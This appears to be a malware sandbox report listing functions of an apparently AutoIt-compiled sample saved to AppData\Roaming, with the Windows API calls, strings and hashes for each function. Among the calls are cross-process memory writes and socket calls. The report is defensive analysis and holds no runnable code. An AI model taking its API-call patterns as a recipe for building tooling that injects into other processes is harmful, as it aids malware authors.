Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: 5$G$Variable must be of type 'Object'.
API String ID: 535116098-3733170431
Opcode ID: 5c7353fba66801fa26d677188dbb0eebeb8b12f0b31285a80e30d126c6ce906e
Instruction ID: 907a425f594f1cd474a77709b7ebd8cd83acef624c5c9ebfabba7cf13b76efce
Opcode Fuzzy Hash: 5c7353fba66801fa26d677188dbb0eebeb8b12f0b31285a80e30d126c6ce906e
Instruction Fuzzy Hash: 80918DB5A0020AEFCF14EF58D8949BDB7B5FF88708F108059E906AB391DB31AE45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 01312716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0131B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,013121D0,?,?,00000034,00000800,?,00000034), ref: 0131B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 01312760

Part of subcall function 0131B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,013121FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0131B3F8

Part of subcall function 0131B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0131B355
Part of subcall function 0131B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,01312194,00000034,?,?,00001004,00000000,00000000), ref: 0131B365
Part of subcall function 0131B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,01312194,00000034,?,?,00001004,00000000,00000000), ref: 0131B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 013127CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0131281A

Strings

@, xrefs: 01312832

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 264bb247d7ba46e18bb89064fbdbb00fd1020b251f4437bd2229fb14ec7d4656
Instruction ID: cc058de352f9817fcb1a3ca60435b3f917a1ae2bf9e027b7d043d4a152cb173d
Opcode Fuzzy Hash: 264bb247d7ba46e18bb89064fbdbb00fd1020b251f4437bd2229fb14ec7d4656
Instruction Fuzzy Hash: 28414D76900219BFDB14DFA8CD81EEEBBB8EF19304F108095EA55B7184DA706E45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 012E172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\fredchungel99962.exe,00000104), ref: 012E1769
_free.LIBCMT ref: 012E1834
_free.LIBCMT ref: 012E183E

Strings

C:\Users\user\AppData\Roaming\fredchungel99962.exe, xrefs: 012E1760, 012E1767, 012E1796, 012E17CE

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Roaming\fredchungel99962.exe
API String ID: 2506810119-1868538124
Opcode ID: 59954691f006e4eed9d628fe7c3ffb4f57085b92b091960af62061b34bc7f1d2
Instruction ID: eaa1c63cef606bcadb10e3eed7b453043730fdb9c695a5e04a3fb8d964e93798
Opcode Fuzzy Hash: 59954691f006e4eed9d628fe7c3ffb4f57085b92b091960af62061b34bc7f1d2
Instruction Fuzzy Hash: 9331E371A50319EFEB25DF99D888DAEBBFCEB95710F904176E905D7200D7708A50CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01344416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 013444AA
GetWindowLongW.USER32 ref: 013444C7
SetWindowLongW.USER32 ref: 013444D7

Strings

SysTreeView32, xrefs: 0134447C

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: ce7ccdef1514fb657d9270d22cd41d55087b302cc33d30543ff9770bd6f90103
Instruction ID: c305f88e20239ca237302d2b1eaae64b11e63ebf2a0ba13452100828847e3df5
Opcode Fuzzy Hash: ce7ccdef1514fb657d9270d22cd41d55087b302cc33d30543ff9770bd6f90103
Instruction Fuzzy Hash: 32317031210605AFDF219E78DC45BEA7BA9EB08338F244725F975A22D0D774F8519B50

Uniqueness

Uniqueness Score: -1.00%

Function 01344537 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0134461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01344634

Strings

', xrefs: 0134458E
8lr, xrefs: 013445D7

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: MessageSend
String ID: '$8lr
API String ID: 3850602802-3349724403
Opcode ID: ca0b0dc11f220606bba3eda36abd2790241aa2a1c51c6cc4486ccc93dd9eeeef
Instruction ID: aaf5a4757ffc72f25129970a81b11024a309a5dc5f8189a8285b1393f4ef3583
Opcode Fuzzy Hash: ca0b0dc11f220606bba3eda36abd2790241aa2a1c51c6cc4486ccc93dd9eeeef
Instruction Fuzzy Hash: 8E31F474A0120ADFDF14CFA9C981BDABBF9FB49314F14406AEA05AB741D770A941CF90

Uniqueness

Uniqueness Score: -1.00%

Function 012B3923 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 012F33A2

Part of subcall function 012B6B57: _wcslen.LIBCMT ref: 012B6B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 012B3A04

Strings

Line: , xrefs: 012F33EB
pWr, xrefs: 012B3986, 012F33C9

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line: $pWr
API String ID: 2289894680-3052496903
Opcode ID: 945da249f9d2881ce9d25f89c7bef21a16f1171c995d9e298a1dd483a0deceba
Instruction ID: b763690debc9e56b457aa0e7419ef4d191f30dd406a0c52e3510e9cd1a6a1754
Opcode Fuzzy Hash: 945da249f9d2881ce9d25f89c7bef21a16f1171c995d9e298a1dd483a0deceba
Instruction Fuzzy Hash: DE31B471429302AFD725EB24D885BEFB7DCBB50794F00452EE69993180EF709549C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 0133304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0133335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,01333077,?,?), ref: 01333378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0133307A
_wcslen.LIBCMT ref: 0133309B
htons.WSOCK32(00000000,?,?,00000000), ref: 01333106

Strings

255.255.255.255, xrefs: 01333095, 0133309A

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 6bde088547efa1d50f3eedb9318aa6a0fda61200cd54e02bd4bd82f04656afad
Instruction ID: e004e020db8188cd59a942abc02bff5f0b47868e038dedefcd1da88fdd2ab706
Opcode Fuzzy Hash: 6bde088547efa1d50f3eedb9318aa6a0fda61200cd54e02bd4bd82f04656afad
Instruction Fuzzy Hash: D931B0396042059FDB20DF2CC585AA9BBF4FF9431CF14C059E9168B7A2DB32E985C764

Uniqueness

Uniqueness Score: -1.00%

Function 013195AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0131961D

Strings

#notrayicon, xrefs: 013195B7
#requireadmin, xrefs: 013195D9
#OnAutoItStartRegister, xrefs: 013195F3

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 22c19e0236629019ef0794803795cf6a816d38bbe3b8c306ba99cad31d1905d6
Instruction ID: e503922a4349f4aa2982aaca121bab48ef840023264bf03bc828eb06d1f2e753
Opcode Fuzzy Hash: 22c19e0236629019ef0794803795cf6a816d38bbe3b8c306ba99cad31d1905d6
Instruction Fuzzy Hash: D421AD32110112A7E339AB2DDC21FB773DCAFA132CF04442AFA49A7148EB50A941C3E1

Uniqueness

Uniqueness Score: -1.00%

Function 013437B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01343840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01343850
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 01343876

Strings

Listbox, xrefs: 0134380F

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 570ceb7527c572861a0f7cde6c253ecb5a6771bed8574a85569c7f36a579e3ab
Instruction ID: e124e4e4f5dfdbb3d8308a04dc41380457e44273e0386bd44ba662a2e9f5a229
Opcode Fuzzy Hash: 570ceb7527c572861a0f7cde6c253ecb5a6771bed8574a85569c7f36a579e3ab
Instruction Fuzzy Hash: A52183726111287BEB22CF59CC45EBB7BAEFF89754F108114F9549B190C671EC518790

Uniqueness

Uniqueness Score: -1.00%

Function 013249F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 01324A08
GetVolumeInformationW.KERNEL32 ref: 01324A5C
SetErrorMode.KERNEL32(00000000,?,?,0134CC08), ref: 01324AD0

Strings

%lu, xrefs: 01324A6F

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 340d85cbe6dd4b5b53873119f8cc75d4eecfa7aec641be713f3bcec457c6ce26
Instruction ID: 2ce896bcd72a7e3f5659125657f4711b95cc46b62f310c69580fdc25c4cb0984
Opcode Fuzzy Hash: 340d85cbe6dd4b5b53873119f8cc75d4eecfa7aec641be713f3bcec457c6ce26
Instruction Fuzzy Hash: 0E313275A00119AFDB10DF58C9C4EAA7BF8EF48308F1480A9E909DB351DB71ED45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 013441EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0134424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 01344264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01344271

Strings

msctls_trackbar32, xrefs: 01344226

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: d59d23471b26f51f5e60730fa79773b1256d069e4317996b753d6739c1f0d4b1
Instruction ID: e2fed2573ba21896d468342d124b00ba53ac01319170df1f85a2881f1f1a500b
Opcode Fuzzy Hash: d59d23471b26f51f5e60730fa79773b1256d069e4317996b753d6739c1f0d4b1
Instruction Fuzzy Hash: 4511C231240248BFEF215F69CC46FAB7BECEF95B68F010624FA55E6090D671E8119B20

Uniqueness

Uniqueness Score: -1.00%

Function 01312F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 012B6B57: _wcslen.LIBCMT ref: 012B6B6A

Part of subcall function 01312DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 01312DC5
Part of subcall function 01312DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 01312DD6
Part of subcall function 01312DA7: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000), ref: 01312DDD
Part of subcall function 01312DA7: AttachThreadInput.USER32(00000000,?,00000000), ref: 01312DE4

GetFocus.USER32 ref: 01312F78

Part of subcall function 01312DEE: GetParent.USER32(00000000), ref: 01312DF9

GetClassNameW.USER32(?,?,00000100), ref: 01312FC3
EnumChildWindows.USER32 ref: 01312FEB

Strings

%s%d, xrefs: 01312FFF

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 3b8ba24120d42190b5227ac990a356838d39da1f8511812c9040f9e4faf1b47a
Instruction ID: c86f59700ad24e192d8f86e6f1a029eaba17c585cd27e238f69519b220c398e5
Opcode Fuzzy Hash: 3b8ba24120d42190b5227ac990a356838d39da1f8511812c9040f9e4faf1b47a
Instruction Fuzzy Hash: 2811B7756002066BDF187F78C8D4EFE37AABF94318F049079E91A9B245DE3469458B70

Uniqueness

Uniqueness Score: -1.00%

Function 01345882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32 ref: 013458C1
SetMenuItemInfoW.USER32 ref: 013458EE
DrawMenuBar.USER32 ref: 013458FD

Strings

0, xrefs: 0134588F

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 5a2a9fdc6ba489713ca3a7f836421636cb92887362b3427dcd02a46412cfe157
Instruction ID: 3affcad2dfbcb91c90272fa9af10db33d39b25c465713c8cb419f40055b76ca7
Opcode Fuzzy Hash: 5a2a9fdc6ba489713ca3a7f836421636cb92887362b3427dcd02a46412cfe157
Instruction Fuzzy Hash: 7C01C435900208EFDB219F11DC44BAEBBB9FF45B64F008099E949D6141DB309A80DF60

Uniqueness

Uniqueness Score: -1.00%

Function 01347803 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 01347805
GetFocus.USER32 ref: 0134780D

Part of subcall function 012C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 012C9BB2

Part of subcall function 012C9944: GetWindowLongW.USER32(?,000000EB), ref: 012C9952

SendMessageW.USER32(00725208,000000B0,000001BC,000001C0), ref: 0134787A

Strings

8lr, xrefs: 01347841, 01347852

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Window$Long$FocusForegroundMessageSend
String ID: 8lr
API String ID: 3601265619-2725927297
Opcode ID: 7f3238165956f5af38fe776d8412482c7053d3da2e4e5782fa52bfa1de368724
Instruction ID: 68dcb6239ef365ce2fe663de92b41ffb704e7eadf9a7362af3c3f42badf7cf3f
Opcode Fuzzy Hash: 7f3238165956f5af38fe776d8412482c7053d3da2e4e5782fa52bfa1de368724
Instruction Fuzzy Hash: D80184355012008FE725DB3CD849AB67BE9BF8A328F19066DE52587294DB317846CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012D0242 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(P=r,01381884,?,?,012C198B,01382518,?,?,?,012B12F9,00000000), ref: 012D024D
LeaveCriticalSection.KERNEL32(P=r,?,012C198B,01382518,?,?,?,012B12F9,00000000), ref: 012D028A

Strings

P=r, xrefs: 012D0247, 012D024C, 012D0289

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: P=r
API String ID: 3168844106-1193193228
Opcode ID: 73f98bc87ec523008646059201b9979b74064a68f5d52244a308f0048bb7cfe8
Instruction ID: bd84531e76f5714e94dfe0be24cf237e9857696fbfe72042c86f0e60ae0ea771
Opcode Fuzzy Hash: 73f98bc87ec523008646059201b9979b74064a68f5d52244a308f0048bb7cfe8
Instruction Fuzzy Hash: 75F0A739616246DFC734AF58D44CA6A7BA8FB46B31F14021DF659472E0CB705841CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0131007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16553b0ace1e66d178b62e59ddb992b6d462b1f429f7a8b595292a40f9678511
Instruction ID: 8f7f79c2aeda6d5162b02b00083c7de0a8d03644d99f9c645510b8c66d361877
Opcode Fuzzy Hash: 16553b0ace1e66d178b62e59ddb992b6d462b1f429f7a8b595292a40f9678511
Instruction Fuzzy Hash: 60C15F75A0020AEFDB19CF98C894AAEB7B5FF48708F108598F505EB255D731ED82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0133342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 01333459
CoUninitialize.OLE32 ref: 01333463
VariantInit.OLEAUT32(?), ref: 0133346E
VariantClear.OLEAUT32(?), ref: 0133371B

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: 2eb4c73e19fefe78b09dc63a476dd72b3afbd60f9eef6085eaaa193da26fd2ec
Instruction ID: 0f8d39591a5b464e482740d5611db558cde83b65dc548219a63f8d4622f6afab
Opcode Fuzzy Hash: 2eb4c73e19fefe78b09dc63a476dd72b3afbd60f9eef6085eaaa193da26fd2ec
Instruction Fuzzy Hash: AAA169756143019FD710DF28C484A6ABBE9FF88768F04885DF98A9B3A1DB30ED41CB95

Uniqueness

Uniqueness Score: -1.00%

Function 01310436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000), ref: 013105F0
CoTaskMemFree.OLE32(00000000), ref: 01310608
CLSIDFromProgID.OLE32(?,?), ref: 0131062D
_memcmp.LIBVCRUNTIME ref: 0131064E

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

